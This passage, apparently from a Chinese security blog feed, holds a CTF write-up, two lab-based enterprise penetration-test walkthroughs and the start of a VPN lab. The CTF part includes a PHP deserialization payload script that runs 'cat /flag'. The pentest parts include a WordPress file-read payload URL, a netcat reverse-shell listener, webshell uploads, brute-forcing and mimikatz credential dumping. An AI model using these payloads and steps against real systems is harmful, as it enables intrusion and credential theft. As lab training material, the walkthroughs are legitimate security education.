class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒████████▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒</span><br><span class="line">▒▒▒▒████▒▒▒▒▒▒████▒▒▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒██▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒██</span><br><span class="line">████████████▒▒██████████████████▒▒▒▒▒▒▒▒▒▒▒▒██████████████████▒▒▒▒▒▒▒▒██████████████████</span><br><span class="line">████████████▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██████████▒▒▒▒</span><br><span class="line">--></span><br><span class="line"><script src=<span class="string">"//cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"</span>></script></span><br><span class="line"><div id=<span class="string">"snowfall"</span>></div></span><br><span class="line"><script></span><br><span class="line"><span class="title function_ invoke__">particlesJS</span>(<span class="string">"snowfall"</span>, {</span><br><span class="line"> <span 
class="string">"particles"</span>: {</span><br><span class="line"> <span class="string">"number"</span>: {</span><br><span class="line"> <span class="string">"value"</span>: <span class="number">100</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"shape"</span>: {</span><br><span class="line"> <span class="string">"type"</span>: <span class="string">"circle"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"size"</span>: {</span><br><span class="line"> <span class="string">"value"</span>: <span class="number">10</span>,</span><br><span class="line"> <span class="string">"random"</span>: <span class="literal">true</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"line_linked"</span>: {</span><br><span class="line"> <span class="string">"enable"</span>: <span class="literal">false</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">"move"</span>: {</span><br><span class="line"> <span class="string">"enable"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="string">"speed"</span>: <span class="number">2</span>,</span><br><span class="line"> <span class="string">"direction"</span>: <span class="string">"bottom"</span>,</span><br><span class="line"> <span class="string">"straight"</span>: <span class="literal">false</span></span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> <span class="string">"interactivity"</span>: {</span><br><span class="line"> <span class="string">"detect_on"</span>: <span class="string">"canvas"</span>,</span><br><span class="line"> <span class="string">"events"</span>: {</span><br><span class="line"> <span class="string">"onhover"</span>: {</span><br><span class="line"> <span class="string">"enable"</span>: <span class="literal">false</span></span><br><span class="line"> }</span><br><span class="line"> 
},</span><br><span class="line"> <span class="string">"modes"</span>: {</span><br><span class="line"> <span class="string">"push"</span>: {</span><br><span class="line"> <span class="string">"particles_nb"</span>: <span class="number">12</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></script></span><br><span class="line"><!--</span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=src"</span>>我真的是源码?</a></span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=cmd"</span>>干点好事!</a></span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=upload"</span>>送点东西!</a></span><br><span class="line"><a href=<span class="string">"/?whatareyounongshane=tellmetruth"</span>>快告诉我真相!</a></span><br><span class="line">--></span><br><span class="line"></body> </span><br><span class="line">所以哪个ISCC是真的?</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url=<span class="string">"http://39.96.91.106:7050/"</span></span><br><span class="line"></span><br><span class="line">files={</span><br><span class="line"> <span class="string">'iscc_file'</span>:(<span class="string">"b"</span>,<span class="built_in">open</span>(<span class="string">"1.png"</span>,<span class="string">"rb"</span>)),</span><br><span class="line"> <span 
class="string">"_SESSION"</span>:(<span class="string">"isccIsCciScc1scc"</span>,<span class="string">"hello"</span>)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">r=requests.post(url=url+<span class="string">"??=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A1%3A%22a%22%3BO%3A13%3A%22ISCC_ReSetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A1%3A%22b%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D"</span>,files=files)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF </category>
</categories>
<tags>
<tag> CTF </tag>
</tags>
</entry>
<entry>
<title>Enterprise Penetration Testing 2</title>
<link href="/2021/05/03/%E6%B8%97%E9%80%8F2/"/>
<url>/2021/05/03/%E6%B8%97%E9%80%8F2/</url>
<content type="html"><![CDATA[<h3 id="实验描述"><a href="#实验描述" class="headerlink" title="实验描述"></a>Lab Description</h3><p>The attacker machine runs Kali. After entering the system it defaults to a command-line interface; entering the startx command opens the graphical interface.</p><p>All the information and tools needed are placed in the /home/Hack directory.</p><p>The task of this lab is to go from two hosts on the external network, through a proxy, into two hosts on the internal network. During penetration one generally first runs a port scan to infer the services running on the host, then uses exploit scripts and other scanning tools to confirm that the vulnerabilities exist, and finally completes the host compromise and obtains privileges.</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Lab Objectives</h3><p>Exploitation of the WebLogic Java deserialization vulnerability<br>Exploitation of the WordPress arbitrary file read vulnerability<br>Exploitation of the WordPress command execution vulnerability<br>Getting a shell on WordPress with a self-modified exploit<br>Scanning the internal network through a proxy<br>Redis unauthorized access and understanding its configuration file<br>Ffmpeg arbitrary file read combined with Redis exploitation<br>Drupal remote code execution caused by improper YAML parser handling</p><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>Lab Environment</h3><table><thead><tr><th>Operating System</th><th>IP Address</th><th>Server Role</th><th>Login Credentials</th></tr></thead><tbody><tr><td>Kali Linux</td><td>192.168.2.10</td><td>Attacker machine</td><td>Username: root; Password: Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.2.11</td><td>Target machine</td><td>Username: root; Password: Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.1.10</td><td>Target machine</td><td>Username: root; Password: Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.1.11</td><td>Target machine</td><td>Username: root; Password: Simplexue123</td></tr><tr><td>Centos 7</td><td>192.168.2.200</td><td>Target machine</td><td>Username: root; Password: Simplexue123</td></tr></tbody></table><h3 id="任务一-Weblogic反序列化"><a href="#任务一-Weblogic反序列化" class="headerlink" title="任务一 Weblogic反序列化"></a>Task 1: WebLogic Deserialization</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Scan the external network as a whole and probe the host information exposed externally</span><br><span class="line">Use the Java deserialization exploit script to execute system commands.</span><br></pre></td></tr></table></figure><p>Lab Objectives</p><p>By completing this task, students are expected to master the technique of attacking the WebLogic service with a Java deserialization exploit script: the common ports of the WebLogic service, how to launch a jar program, and the process, methods and techniques of attacking WebLogic, laying a solid exploitation foundation for the subsequent enterprise penetration testing tasks.</p><p>Open the Kali attacker machine</p><p>Visit 192.168.2.10:7001</p><img src="https://i.loli.net/2021/05/11/8Or6FDo15R3dEy4.png" alt="image-20210511164542470" style="zoom:67%;" /><p>Open the tools in the home/HACK directory</p><img 
src="https://i.loli.net/2021/05/11/5M1iF9b6wA47XfT.png" alt="image-20210511164750762" style="zoom:67%;" /><img src="https://i.loli.net/2021/05/11/hWqTXOIlcetrGs1.png" alt="image-20210511165117929" style="zoom:67%;" /><p>Enter the HOST, the port and the CMD command</p><img src="https://i.loli.net/2021/05/11/VfiAsMBd74ZwgqL.png" alt="image-20210511165325031" style="zoom:67%;" /><p>Click connect and execute</p><p>Following the hint, find the flag.txt file under /home/flag</p><img src="https://i.loli.net/2021/05/11/5VsN8uqYGF6pomC.png" alt="image-20210511165712024" style="zoom:67%;" /><h3 id="任务二-Wordpress任意文件读取"><a href="#任务二-Wordpress任意文件读取" class="headerlink" title="任务二 Wordpress任意文件读取"></a>Task 2: WordPress Arbitrary File Read</h3><p>Task content:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Use the wpscan tool to scan for WordPress plugin vulnerabilities</span><br><span class="line">Focus on the arbitrary file read vulnerability in the WP Hide Security Enhancer plugin, and use it to read the site's main files.</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/11/ieEOhInjoWZ9B2Y.png" alt="image-20210511170357840"></p><p>Use wpscan to scan the WordPress site for vulnerable plugins</p><p>Command: wpscan --url 192.168.2.11 --enumerate p</p><img src="https://i.loli.net/2021/05/11/HxuqNEsvwgU6IMG.png" alt="image-20210511170541006" style="zoom:67%;" /><p>A vulnerable plugin is found</p><p>Following the hint, use the payload directly</p><p><a href="http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php">http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php</a></p><p>Get the flag</p><p><img src="https://i.loli.net/2021/05/11/tpTsrgoiRYGIHC2.png" alt="image-20210511170853149"></p><h3 id="任务三-Wordpress命令执行"><a href="#任务三-Wordpress命令执行" class="headerlink" title="任务三 Wordpress命令执行"></a>Task 3: WordPress Command Execution</h3><p>Task content:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span 
class="line">Use Burp Suite's Repeater module to modify the request and probe which field is vulnerable.</span><br><span class="line">Run the exploit script for the WordPress mailer command execution vulnerability to try to obtain a shell.</span><br></pre></td></tr></table></figure><p>Procedure</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Visit the target site, configure a proxy in the browser and intercept the request with Burp Suite</span><br><span class="line">Use Burp Suite's Repeater module to probe the vulnerable field.</span><br><span class="line">Understand the principle of the WordPress mailer vulnerability and run the wp.sh script to obtain the response</span><br></pre></td></tr></table></figure><p>First, find the login entry point</p><img src="https://i.loli.net/2021/05/11/ABFOiVKzjkr4a5q.png" alt="image-20210511171155980" style="zoom:67%;" /><p>Configure the proxy in Firefox and Burp Suite and intercept the request.</p><p><img src="https://i.loli.net/2021/05/11/C8fGIgnPWyF97i6.png" alt="image-20210511171245109"></p><p><img src="https://i.loli.net/2021/05/11/nDBkXY4lsSg3aiJ.png" alt="image-20210511171408750"></p><p><img src="https://i.loli.net/2021/05/11/HK5n8zt7UhfCONd.png" alt="image-20210511171428356"></p><p>Use the provided script to get a shell and obtain the flag</p><h3 id="任务四-改进漏洞利用脚本获得命令执行权限"><a href="#任务四-改进漏洞利用脚本获得命令执行权限" class="headerlink" title="任务四 改进漏洞利用脚本获得命令执行权限"></a>Task 4: Improve the Exploit Script to Obtain Command Execution</h3><p>Lab Goals</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Understand the concept of network security vulnerabilities and the existing vulnerability scanning tools. Recognize common network security vulnerabilities.</span><br><span class="line">Become familiar with the sendmail command syntax.</span><br><span class="line">Master the usual download-and-execute exploitation approach for webshell command execution vulnerabilities.</span><br><span class="line">Master how to configure a proxy in the browser.</span><br><span class="line">Master the process of modifying and testing requests with Burp Suite's Repeater module.</span><br></pre></td></tr></table></figure><p>Lab Steps</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Read the exploit script wordpress-rce-exploit.sh and understand how the script was improved.</span><br><span class="line">Fill in the key information in the exploit script, such as the callback IP and listening port. Listen locally on the configured port to receive the reverse shell.</span><br><span class="line">Use the shell to upload reGeorg's tunnel.php and set up a proxy with reGeorg</span><br><span class="line">Configure the reGeorg proxy through proxychains and use it to scan the internal 1.0 subnet</span><br></pre></td></tr></table></figure><img src="https://i.loli.net/2021/05/11/GJUg7vFEZTt4Ds8.png" alt="image-20210511180514611" style="zoom:67%;" /><p>First, look at the script contents</p><p>Change recv_host="192.168.2.200"</p><p>Set up the listening port</p><p>nc -lvvp 7777</p><p>Reverse shell</p><h3 id="任务五-redis未授权访问-ffmpeg-任意文件读取"><a href="#任务五-redis未授权访问-ffmpeg-任意文件读取" class="headerlink" title="任务五 redis未授权访问+ffmpeg 任意文件读取"></a>Task 5: Redis Unauthorized Access + Ffmpeg Arbitrary File Read</h3><p>Task content:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">From the information on the web page, this is a small application that processes video with ffmpeg and has only upload, download and delete functions. It has the ffmpeg file read vulnerability: by crafting a specific AVI video, the video produced after ffmpeg processing will contain the contents of the desired file. Use the file read vulnerability to obtain the contents of the Redis configuration file.</span><br><span class="line">The Redis database service allows external connections and has no password set, so it can be accessed freely; this is the unauthorized access vulnerability. Normally files can be written, but during the process it turns out that the required config command has been renamed. The renaming of the config command must be written in the Redis configuration file, and the path of the configuration file can be obtained by running info in Redis. In this environment, obtain a shell on the Redis server.</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/11/1DOPUupfoXK9gmw.png" alt="image-20210511192133312"></p><h3 id="任务六-drupal8远程代码执行"><a href="#任务六-drupal8远程代码执行" class="headerlink" title="任务六 drupal8远程代码执行"></a>Task 6: Drupal 8 Remote Code Execution</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Use the browser with the proxy to access the internal machine 192.168.1.10.</span><br><span class="line">Use the Drupal 8 PHP deserialization vulnerability to write a webshell to the target server.</span><br><span class="line">Use Cknife to connect to the generated webshell</span><br></pre></td></tr></table></figure><p>Lab Goals</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。</span><br><span class="line">熟悉网站webshell的概念,理解上传webshell、获取webshell权限的意义和方法。</span><br><span class="line">掌握webshell工具Cknife的基本使用,特别是设置代理的功能,查看上传文件,命令执行等功能的使用。</span><br><span class="line">掌握在浏览器上配置代理的方法。</span><br><span class="line">掌握利用drupal8的php反序列化漏洞的攻击方法和相关的技术原理。</span><br></pre></td></tr></table></figure><p>操作步骤</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">使用浏览器结合proxychains用之前的代理访问内网中的drupal8的web应用。</span><br><span class="line">弱口令登录目标网站后台</span><br><span class="line">利用反序列化漏洞执行phpinfo 探测网站信息</span><br><span class="line">利用反序列化漏洞写入webshell,并测试存在</span><br><span class="line">用Cknife设置代理连接webshell获取网站的权限</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/11/FxTUPCjXGvIynlB.png" alt="image-20210511192257809"></p><p><img src="https://i.loli.net/2021/05/11/ikNn3sPr6BKC1wb.png" alt="image-20210511192310808"></p><p>然后利用exp写入webshell</p><p><img src="https://i.loli.net/2021/05/11/rRZopefLCVQz47c.png" alt="image-20210511192516771"></p><p>中国菜刀连接,即可获得flag。</p>]]></content>
<categories>
<category> Pentesting </category>
</categories>
</entry>
<entry>
<title>Enterprise Penetration Test 1</title>
<link href="/2021/05/01/%E6%B8%97%E9%80%8F1/"/>
<url>/2021/05/01/%E6%B8%97%E9%80%8F1/</url>
<content type="html"><![CDATA[<h3 id="实验描述"><a href="#实验描述" class="headerlink" title="Lab description"></a>Lab description</h3><p>The task of this lab is to pivot from an external host, through a proxy, into hosts on the internal network. A penetration test usually starts with a port scan to guess which services a host runs, then confirms the presence of vulnerabilities with exploit scripts and other scanners, and finally compromises the host and obtains access.</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="Lab objectives"></a>Lab objectives</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Brute-force the website backend, log in and upload a webshell</span><br><span class="line">Obtain a webshell through a SQL injection vulnerability</span><br><span class="line">Write a webshell through phpMyAdmin</span><br><span class="line">Scan the internal network through a proxy</span><br><span class="line">Log in to internal hosts with passwords obtained from the database</span><br><span class="line">Dump the domain controller account and password and log in to the domain controller</span><br></pre></td></tr></table></figure><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="Lab environment"></a>Lab environment</h3><table><thead><tr><th>Operating system</th><th>IP address</th><th>Role</th><th>Credentials</th></tr></thead><tbody><tr><td>Windows7</td><td>192.168.1.200</td><td>Attacker workstation</td><td>Username: administrator; password: Simplexue123</td></tr><tr><td>centos 7</td><td>192.168.1.10</td><td>Target</td><td>Username: root; password: Simplexue123</td></tr><tr><td>Windows2012</td><td>192.168.2.10</td><td>Target</td><td>Username: administrator; password: Simplexue123</td></tr><tr><td>Windows2012</td><td>192.168.2.11</td><td>Target</td><td>Username: administrator; password: Simplexue123</td></tr></tbody></table><h3 id="任务一-后台文件上传"><a href="#任务一-后台文件上传" class="headerlink" title="Task 1: Backend file upload"></a>Task 1: Backend file upload</h3><p>Description:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Use wwwscan to scan for the site's backend directory, brute-force the backend username and password with Burp Suite, obtain the CMS administrator password and log in to the backend.</span><br><span class="line">Craft a PHP one-line webshell, upload it to the target server through the backend's arbitrary file upload vulnerability, then connect to it with China Chopper to obtain a webshell on the target server for the following steps.</span><br></pre></td></tr></table></figure><p>First, open the site in the browser.</p><p><img src="https://i.loli.net/2021/05/06/U5wakiReVrG76Ho.png" alt="image-20210506201939054"></p><p>It is DedeCMS (织梦CMS).</p><p>Use wwwscan to brute-force the backend directory.</p><p><img src="https://i.loli.net/2021/05/06/YPVg21coT3bOSRJ.png" alt="image-20210506202129351"></p><p><img src="https://i.loli.net/2021/05/06/NYm1nIzM2aSgc3x.png" alt="image-20210506202228623"></p><p>The backend login is found at manager/login.php</p><p><img src="https://i.loli.net/2021/05/06/vjwTB57sKW6eVfC.png" alt="image-20210506202453744"></p><p>Enter a password and capture the request with Burp.</p><p><img src="https://i.loli.net/2021/05/06/4vabkWjgtGyYoh5.png" alt="image-20210506202604343"></p><p><img src="https://i.loli.net/2021/05/06/cxjk2VEC8JsN6Hr.png" alt="image-20210506202625359"></p><p>Select a password dictionary and brute-force.</p><p><img src="https://i.loli.net/2021/05/11/LmEGcCqKJ7rnVUT.png" alt="image-20210506202719447"></p><p>Success: admin:1q2w3e4r</p><p><img src="https://i.loli.net/2021/05/06/z91RP2IEyxBjZvl.png" alt="image-20210506202909814"></p><p>Log in and upload the one-line webshell.</p><p><img src="https://i.loli.net/2021/05/06/4zsJ9egB6DHLhFl.png" alt="image-20210506203157878"></p><p>Open China Chopper and connect.</p><p><img src="https://i.loli.net/2021/05/06/YOsSck3v4HxGlfe.png" alt="image-20210506203933982"></p><p><img src="https://i.loli.net/2021/05/06/IQX6vGCH8xW2PAi.png" alt="image-20210506204020172"></p><h3 id="任务二-sql注入"><a href="#任务二-sql注入" class="headerlink" title="Task 2: SQL injection"></a>Task 2: SQL injection</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Use the directory scan results to reach the test SQL page and use the SQL injection vulnerability to obtain information about the site's database.</span><br><span class="line">Construct SQL injection statements to read the web server configuration file, find the web root, write a PHP one-line webshell and obtain a webshell.</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Visit the /sql directory and use the SQL injection vulnerability to obtain basic database information, such as the current database user.</span><br><span class="line">Use the SQL injection vulnerability to read the Apache configuration file, and write the one-line webshell into the web root found in that file.</span><br><span class="line">Connect to the one-line webshell on the target with China Chopper, find the flag in the files under the web root and submit it.</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/t8cnPa4fMJRUsLv.png" alt="image-20210506204835331"></p><p><img src="https://i.loli.net/2021/05/06/EzkZ1oy2CneVT3l.png" alt="image-20210506204901994"></p><p><img src="https://i.loli.net/2021/05/06/UAGXryeNWLQFZDh.png" alt="image-20210506205006586"></p><p>Read the configuration file.</p><p>Use double-writing of keywords to bypass the filter.</p><p><img src="https://i.loli.net/2021/05/06/YVy6zOT1J2fcg5C.png" alt="image-20210506205715832"></p><p><img src="https://i.loli.net/2021/05/06/Ni8IXnZ4eRWr9bx.png" alt="image-20210506205902058"></p><p>Write the one-line webshell into /var/www/html.</p><p><img src="https://i.loli.net/2021/05/06/5YCon7MD1EvIwTl.png" alt="image-20210506210029983"></p><p>Connect with China Chopper and retrieve the flag.</p><h3 id="任务三-phpmyadmin写shell"><a href="#任务三-phpmyadmin写shell" class="headerlink" title="Task 3: Writing a shell through phpMyAdmin"></a>Task 3: Writing a shell through phpMyAdmin</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Use the directory scan results to reach the phpMyAdmin page and log in to phpMyAdmin with a weak password.</span><br><span class="line">Construct SQL statements to read the web server configuration file, find the web root, write a PHP one-line webshell and obtain a webshell.</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/MdVBYUoZ9lDTSPm.png" alt="image-20210506210247038"></p><p>Log in with the weak credentials</p><p>root / root</p><p><img src="https://i.loli.net/2021/05/06/YrQ3Cpa6lk1oXPD.png" alt="image-20210506210525029"></p><p><img src="https://i.loli.net/2021/05/06/6madW51HRokDpih.png" alt="image-20210506210613967"></p><h3 id="任务四"><a href="#任务四" class="headerlink" title="Task 4"></a>Task 4</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Upload an internal-network scanning script to the web server and scan the 192.168.2.0/24 subnet.</span><br><span class="line">Upload the reGeorg tool to the web server and start the proxy service.</span><br><span class="line">Use Proxifier to proxy a remote desktop connection and log in to 2.11.</span><br><span class="line">Read the flag string from the file in the root of the C: drive; the task is complete once it is submitted.</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/Fw7pUE6tNOCcn2o.png" alt="image-20210506211116806"></p><p><img src="https://i.loli.net/2021/05/06/vBJpKSn2WsUkFe9.png" alt="image-20210506211151526"></p><h3 id="任务五"><a href="#任务五" class="headerlink" title="Task 5"></a>Task 5</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">On the machine already reached via Remote Desktop, upload mimikatz and dump the passwords from memory.</span><br><span class="line">Use the dumped password to log in to the other machine, 2.10.</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/05/06/V8pTcCtnD35yfB1.png" alt="image-20210506211320381"></p>]]></content>
<categories>
<category> Pentesting </category>
</categories>
</entry>
<entry>
<title>VPN Lab</title>
<link href="/2021/04/22/VPN%E5%AE%9E%E9%AA%8C/"/>
<url>/2021/04/22/VPN%E5%AE%9E%E9%AA%8C/</url>
<content type="html"><![CDATA[<h3 id="实验任务"><a href="#实验任务" class="headerlink" title="Background"></a>Background</h3><p>A virtual private network (VPN) is defined as a temporary, secure connection established across a public network (usually the Internet): a secure, stable tunnel through the chaotic public network. A VPN is an extension of the enterprise intranet. It lets remote users, branch offices, business partners and suppliers establish trusted, secure connections to the corporate intranet and guarantees secure data transmission. VPNs can provide secure global Internet access for a growing number of mobile users; they can serve as virtual private lines for secure communication between company sites; and they can form secure extranet VPNs that connect business partners and customers cost-effectively.</p><h3 id="实验任务-1"><a href="#实验任务-1" class="headerlink" title="Lab tasks"></a>Lab tasks</h3><p>Task 1: Build a tunnel-based virtual private network with the ip command<br>Task 2: Create encryption keys with the OpenSSL tool<br>Task 3: SSL VPN: installing and configuring OpenVPN<br>Task 4: IPsec VPN principles, installation and configuration<br>Task 5: Implementing overlay-based tunnel networks in cloud computing</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="Lab objectives"></a>Lab objectives</h3><p>Learn how to build a tunnel-based virtual private network<br>Understand encryption algorithms and their applications<br>Learn how to install, deploy and configure the OpenVPN server and client<br>Understand IPsec VPN principles, installation and deployment<br>Understand how overlay networks are implemented in public clouds</p><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="Lab environment"></a>Lab environment</h3><table><thead><tr><th>Operating system</th><th>IP address</th><th>Role</th><th>Credentials</th></tr></thead><tbody><tr><td>Windows2012</td><td>192.168.0.11</td><td>Attacker workstation</td><td>Username: administrator; password: Simplexue123</td></tr><tr><td>centos7_1</td><td>192.168.1.11</td><td>Target</td><td>Username: root; password: Simplexue123</td></tr><tr><td>centos7_2</td><td>192.168.2.11</td><td>Target</td><td>Username: administrator; password: Simplexue123</td></tr></tbody></table><h3 id="任务一"><a href="#任务一" class="headerlink" title="Task 1"></a>Task 1</h3><p>Build a tunnel-based virtual private network with the ip command</p><p>Connect the internal networks of two different sites through an IP tunnel and verify connectivity.</p><img src="https://i.loli.net/2021/04/22/5e2PNlSTRcogbus.png" alt="image-20210422151231083" style="zoom:67%;" /><p>Change the hostnames</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># hostnamectl set-hostname vpn1</span><br><span class="line"># hostnamectl set-hostname vpn2</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# modprobe 